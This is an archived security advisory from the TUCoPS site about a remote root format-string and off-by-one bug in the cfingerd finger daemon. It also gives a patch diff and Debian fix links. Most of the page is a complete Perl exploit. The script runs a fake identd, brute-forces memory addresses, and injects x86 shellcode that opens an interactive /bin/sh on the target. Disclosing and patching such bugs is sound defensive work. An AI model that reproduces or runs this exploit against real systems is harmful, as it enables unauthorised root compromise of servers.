Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: General :: cfinge-1.htm

cfingerd 1.4.3 root exploit



Vulnerability

    cfingerd

Affected

    cfingerd <=1.4.3

Description

    Megyer Laszlo found following. There is a critical bug in cfingerd
    daemon  <=  1.4.3,  (a  classic  format  bug)  that makes possible
    to acquire  full control  over the  remote machine  if it runs the
    cfingerd program, the configurable and secure finger daemon.  In 3
    words:  REMOTE ROOT VULNERABILITY.

    The bug occurs in main.c, line 245, 258 and 268:

                syslog(LOG_NOTICE, (char *) syslog_str);

    We  can  control  the  syslog_str  with  our ident user, that goes
    directly to the  secont parameter of  syslog(). Using %n  and some
    tricks,  we  can  overwrite  anything  in  the  daemon's   memory,
    including the saved eip register.

    The more or less proper usage of syslog this time is here:

                syslog(LOG_NOTICE, "%s", (char *) syslog_str);

    There  are  many  papers  about  format  bugs,  so  we don't write
    detailed infos about it.

    Exploiting it is a  bit tricky because we  use another bug in  the
    code.  The ident reply is something like this:

        3478, 79 : UNIX : USERID : username

    If the username is more than 64 bytes, cfingerd logs some  strange
    string:

        [64b username]3478, 79 : UNIX : USERID : [64b username][rest of the username]

    The following code is responsible of this strange behaviour:

        for (xp=uname; *cp != '\0' &&
        *cp!='\r'&&*cp!='\n'&&strlen(uname)<sizeof(uname); cp++)
            *(xp++) = *cp;

    You can see that no space is left for the string terminating  '\0'
    character, so the next local  variable which is the line  that was
    read from identd will also be returned as the end of the username.
    Example, the fake identd sends:

        [120 B's] : : :[64 A's]
        the username that is returned by get_rfc1413_data() will be:
        [64 A's][120 B's] : : :...

    Then an snprintf cuts the string that will go to syslog() allowing
    only 200 bytes to pass.  If the username is one byte, we will have
    183 bytes we can control there. ("a fingered from  username@host")
    where host  doesn't have  place, so  it won't  get into  syslog().
    (another sechole).

    Now we have a  method to send 183  bytes to syslog().   We have to
    find out some  basic variables to  be able to  exploit this, which
    we can bruteforce easily one-by-one (details in "fingex" exploit).

    #!/usr/bin/perl
    # Cfingerd exploit to the recent syslog format bug.
    # Discovered and written by Lez <abullah@freemail.hu> in 2001.
    # you have to use it as root to bind port 113.

    # tested on Debian 2.1, 2.2

    use IO::Socket;
    #use strict;

    my $network_timeout=5;
    my $sleep_between_fingers=2;  # should be enough
    my $debug_sleep=0;

    my $fingerport=79;
    my $target=$ARGV[0];
    my $debug=1;
    my $test_vulnerability=1;

    # Debian 2.2, cfingerd 1.4.1-1
    #my $control=33;  # if don't set it, exploit will find.
    #my $align=0;     # the same
    #$retaddr=0xbffffab0;
    # my $retaddr=0xbffff880;  # the same
    #$retaddr=0xbffff840;


    my $retvalue=0xbffff980;  # If it finds everything correctly, and says Shell lunched, but
			      # you can't find your uid 0, decrease $retvalue by 30.
    my $bytes_written=32;

    #$control=17;
    #$align=0;
    #$retaddr=0xbffffb80;   #(or 0xbffffb68 0xbffff9d0 0xbffff9cc 0xbffff9c8)
    #$retvalue=0xbffffc20;
    #$bytes_written=32;



    # GOOD:
    my $startsig11=0xbffffbfc;
    my $endsig11=  0xbffff000;

    my $controlstart=45;
    my $controlend=1;

    my $fclient;

    my $shellcode ="\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xb0\x2e\xcd\x80".
	        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b".
	        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd".
	        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
							    #59 bytes

    if (!$target) {print "Usage: $0 target\n";exit}

    # Starting fake identd
    my $identd = IO::Socket::INET->new(
		    Listen => 5,
		    LocalPort => 113,
		    Proto     => 'tcp',
		    Reuse     => 3) or die "Cannot listen to port 113: $!\n";

    if ($test_vulnerability) {&testvuln}

    if (!$control) { &get_control_and_align }
    else {print "Alignment: $align\nControl: $control\n" }

    if (!$retaddr) {
        &find_and_exploit_sigsegv_values
    }
    else {
        printf "Using provided RET address: 0x%x\n",$retaddr;
        &exploit ($retaddr, $retvalue);
    }


    exit;




    sub sendthisone { #sends a string to cfingerd, and returns 1 if the remote machine got SIGSEGV or SIGILL.
		      # a bit tricky
        my $text_to_send=$_[0];

        $text_to_send =~ s/^\ /\ \ /;

        my ($last_119, $gotback);

        $fclient = IO::Socket::INET->new("$target:$fingerport") or die "Cannot connect to $target: $!\n";
        print $fclient "e\n"; # e is the username we query.

        my $ident_client = $identd-> accept;

        my $tmp=<$ident_client>;


        my $first_64= substr($text_to_send, 0, 64);
        if (length($text_to_send) > 64) {
	    $last_119= substr($text_to_send,64);
        }

        sleep $debug_sleep;

        print $ident_client "$last_119: : :$first_64\n"; # we use an other bug
                                                         # in rfc query function
                                                         # to send longer lines.
        close $ident_client;

        eval {
	    local $SIG{ALRM} = sub { die "alarm\n"};
	    alarm ($network_timeout);
	    $gotback= <$fclient>;
	    alarm 0;
        };
        if ($@) {
	    die unless $@ eq "alarm\n";
	    &shell;
        }

        if ($gotback =~ /SIGSEGV/i) {
	    if ($debug == 2) {print "Sending $first_64$last_119: SIGSEGV\n";}
	    elsif ($debug == 1) {system ("echo -n \"*\"");}
	    sleep ($sleep_between_fingers);
	    return 1;
        } elsif ($gotback =~ /SIGILL/i) {
	    if ($debug == 2) {print "Sending $first_64$last_119: SIGILL\n";}
	    elsif ($debug == 1) {system ("echo -n +");}
	    print "Got signal \"Illegal instruction\".\nThe ret address is not correct\n";
	    sleep ($sleep_between_fingers);
	    return 1;
        } else {
	    if ($debug == 2) {print "Sending $first_64$last_119\n";}
	    elsif ($debug == 1) {system ("echo -n .");}
	    sleep ($sleep_between_fingers);
	    return 0;
        }
    }


    sub get_control_and_align {
        for ($control=$controlstart; $control >= $controlend; $control--) {
	    for ($align=3; $align>=0; $align--) {
	        my $s1= "A"x$align . "\x79\xff\xff\xbe" . "%" . $control . "\$n";
	        my $s2= "A"x$align . "\x79\xff\xff\xbf" . "%" . $control . "\$n";

	        if (sendthisone($s1) > sendthisone ($s2)) {
		    print "\nControl: $control\nAlign: $align\n";
		    return;
	        }
	    }
        }
        die "Could not find control and alignment values\n";
    }

    sub find_and_exploit_sigsegv_values {
        my ($sendbuf, @back, $addy, $retaddr, $save);

        print "Searching for eip addresses...\n";

        for ($addy=$startsig11; $addy >= $endsig11; $addy -=4) {
	    $sendbuf = "a"x$align . pack "cccc",$addy,$addy>>8,$addy>>16,$addy>>24;
	    $sendbuf .= "%" . $control . "\$n";

	    if ($addy%0x100) {
	        if (sendthisone($sendbuf)) {

		    &exploit ($addy, $retvalue);    # I'm so lazy
		    &exploit ($addy, $retvalue-60);
		    &exploit ($addy, $retvalue+60);
		    &exploit ($addy, $retvalue-120);
		    &exploit ($addy, $retvalue+120);
		    &exploit ($addy, $retvalue-180);
		    &exploit ($addy, $retvalue+180);
		    &exploit ($addy, $retvalue-240);
		    &exploit ($addy, $retvalue+240);
		    &exploit ($addy, $retvalue-300);
		    &exploit ($addy, $retvalue+300);
		    &exploit ($addy, $retvalue-360);
		    &exploit ($addy, $retvalue+360);
		    &exploit ($addy, $retvalue-420);
		    &exploit ($addy, $retvalue+420);

	        }
	    }
        }
    }

    sub exploit {

        my $addy=$_[0];
        my $value=$_[1];

        my $sendbuf;

        printf "\nExploiting 0x%x, ret:0x%x.\n",$addy,$value;

        $sendbuf = "Z"x$align;
        $sendbuf .= &add_four_addresses($addy);
        $sendbuf .= &add_format_strings($value);

        $sendbuf .= "\x90"x (182-length($sendbuf)-length($shellcode));
        $sendbuf .= $shellcode;

        &sendthisone ($sendbuf);
    }

    sub add_four_addresses {
        my $addy=$_[0];
        my ($back, $i);

        for ($i=0; $i<=3; $i++) {
	    $back .= pack "cccc",
		        ($addy+$i),
		        ($addy+$i)>>8,
		        ($addy+$i)>>16,
		        ($addy+$i)>>24;
        }
        return $back;
    }

    sub add_format_strings {
        my ($back, $i, @a, $xvalue, $nvalue, $back);
        my $ret=$_[0];

        $a[0]=$ret%0x100-$bytes_written;

        for ($i=1; $i<=3; $i++) {
	    $a[$i]= ($ret >> (8*$i) )%0x100 - ($ret >> (8*($i-1)) )%0x100;
        }

        for ($i=0; $i<=3; $i++) {
            $xvalue= &positive($a[$i]);
            $nvalue= $control+$i;

            if ($xvalue <=8) {
                $back .= "A"x$xvalue          .       "%".$nvalue."\$n";
            } else {
                $back .= "%0".$xvalue."x"     .       "%".$nvalue."\$n";
            }
        }
        return $back;
    }

    sub positive {
        my $number=$_[0];
        while ($number < 0) {
            $number += 0x100;
        }
        return $number;
    }

    sub shell {
        my ($cucc, $msg);

        print "Shell launched\n";
        print $fclient "id\n";
        print &my_line(1);

        while (1) {
            $cucc=<STDIN>;
            print $fclient $cucc;

            while ($msg=&my_line(1)) {
    	        print $msg;
            }
        }
    }

    sub my_line {
        my $msg;
        eval {
            local $SIG{ALRM} = sub { die "\n"};
            alarm ($_[0]);
            if ($msg=<$fclient>) {
                alarm (0);
                return $msg;
            }
        };
    }

    sub testvuln {
        if ($debug) {print "Testing if fingerd is vulnerable...   "}
        if (&sendthisone ("%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n")) {
	    print "Yes.\n";
	    return;
        } else {
	    print "No.\n";
	    exit;
        }
    }

Solution

    The attached  patch will  fix the  four bugs:  3 syslog() bugs and
    the bug that allows anybody to send long usernames to syslog()  so
    the hostname wouldn't get there.   To make a bugfixed source  tree
    save the diff as cfingerd-1.4.3.diff and do:

    wget
    http://www.infodrom.ffis.de/projects/cfingerd/download/cfingerd-1.4.3.tar.gz
    tar xfz cfingerd-1.4.3.tar.gz
    cat cfingerd-1.4.3.diff | patch -p0
    
        and the source tree is free of this bug.
    
    --- cfingerd-1.4.3/src/main.c.orig	Fri Aug  6 23:33:38 1999
    +++ cfingerd-1.4.3/src/main.c	Wed Apr 11 18:55:43 2001
    @@ -242,7 +242,7 @@
 	        if (!emulated) {
 		    snprintf(syslog_str, sizeof(syslog_str), "%s fingered (internal) from %s", username,
 		        ident_user);
    -		syslog(LOG_NOTICE, (char *) syslog_str);
    +		syslog(LOG_NOTICE, "%s", (char *) syslog_str);
 	        }

 	        handle_internal(username);
    @@ -255,7 +255,7 @@
 		        snprintf(syslog_str, sizeof(syslog_str), "%s fingered from %s",
 			    prog_config.p_strings[D_ROOT_FINGER], ident_user);

    -		syslog(LOG_NOTICE, (char *) syslog_str);
    +		syslog(LOG_NOTICE, "%s", (char *) syslog_str);
 	        }

 	        handle_standard(username);
    @@ -265,7 +265,7 @@
 		    snprintf(syslog_str, sizeof(syslog_str), "%s %s from %s", username,
 		        prog_config.p_strings[D_FAKE_USER], ident_user);

    -		syslog(LOG_NOTICE, (char *) syslog_str);
    +		syslog(LOG_NOTICE, "%s", (char *) syslog_str);
 	        }

 	        handle_fakeuser(username);
    --- cfingerd-1.4.3/src/rfc1413.c.orig	Sun Aug 29 14:14:25 1999
    +++ cfingerd-1.4.3/src/rfc1413.c	Wed Apr 11 18:53:45 2001
    @@ -98,7 +98,7 @@

 	    if (*(++cp) == ' ') cp++;
 	    memset(uname, 0, sizeof(uname));
    -	for (xp=uname; *cp != '\0' && *cp!='\r'&&*cp!='\n'&&strlen(uname)<sizeof(uname); cp++)
    +	for (xp=uname; *cp != '\0' && *cp!='\r'&&*cp!='\n'&&(strlen(uname)+1)<sizeof(uname); cp++)
 	        *(xp++) = *cp;

 	    if (!strlen(uname)) {

    For Debian Linux:

        http://security.debian.org/dists/stable/updates/main/source/cfingerd_1.4.1-1.1.diff.gz
        http://security.debian.org/dists/stable/updates/main/source/cfingerd_1.4.1-1.1.dsc
        http://security.debian.org/dists/stable/updates/main/source/cfingerd_1.4.1.orig.tar.gz
        http://security.debian.org/dists/stable/updates/main/binary-alpha/cfingerd_1.4.1-1.1_alpha.deb
        http://security.debian.org/dists/stable/updates/main/binary-arm/cfingerd_1.4.1-1.1_arm.deb
        http://security.debian.org/dists/stable/updates/main/binary-i386/cfingerd_1.4.1-1.1_i386.deb
        http://security.debian.org/dists/stable/updates/main/binary-m68k/cfingerd_1.4.1-1.1_m68k.deb
        http://security.debian.org/dists/stable/updates/main/binary-powerpc/cfingerd_1.4.1-1.1_powerpc.deb
        http://security.debian.org/dists/stable/updates/main/binary-sparc/cfingerd_1.4.1-1.1_sparc.deb


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH